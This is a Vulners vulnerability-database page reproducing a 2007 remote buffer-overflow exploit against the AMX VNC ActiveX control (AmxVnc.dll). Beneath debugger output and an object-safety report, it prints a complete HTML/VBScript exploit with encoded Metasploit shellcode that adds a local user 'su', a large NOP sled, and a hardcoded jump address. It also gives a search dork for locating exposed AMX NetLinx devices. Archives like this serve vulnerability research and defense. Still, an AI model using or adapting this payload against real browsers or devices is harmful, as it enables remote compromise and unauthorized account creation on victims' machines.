Vulners
Lucene search
AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) BoF Exploit
===============================================================
AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) BoF Exploit
===============================================================
<!--
21.17 23/06/2007
AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) remote buffer
overflow exploit / tested against IE6 on xp sp2 it
found this one inside GHDB, dork by JimmyNeutron:
WebControl intitle:"AMX NetLinx"
description: "AMX Netlinx is a server appliance which
connects various devices like a beamer, laptop or video
recorder to the internet."
passing A*2000 to Host property:
EAX 03727C20
ECX 027B7890 ASCII "AAAAAAAA...
EDX 41414141
EBX 027ACE80 AmxVnc.027ACE80
ESP 0013DDFC
EBP 0013DE28
ESI 0013E00C
EDI 00000000
EIP 0278D6D1 AmxVnc.0278D6D1
0278D6D1 FF52 04 CALL DWORD PTR DS:[EDX+4]
Access violation when reading 41414145
Password, LogFile properties are also vulnerable
to the same issue
object safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
KillBitSet: False
translation: it works remotely without warnings
rgod
site: retrogod.altervista.org
-->
<HTML>
<object classid='clsid:6318EFFA-BE57-49EE-830C-C5E1ABD9ECCB' id='AmxVnc' ></OBJECT>
<script language='vbscript'>
'metasploit one, add a user "su" with pass "tzu"
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44")
nop = string(9999999,unescape("%90"))
jmp = unescape("%ab%08%3e%7e") '0x7e3e08af user32.dll ,stores 0x07c435ff which reasonably points to our 10M nop, found with msfpescan
suntzu = String(1188, "A") + jmp + nop + scode
AmxVnc.Password = suntzu
</script>
</HTML>
# 0day.today [2018-03-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jun 2007 00:00Current
7.1High risk
Vulners AI Score7.1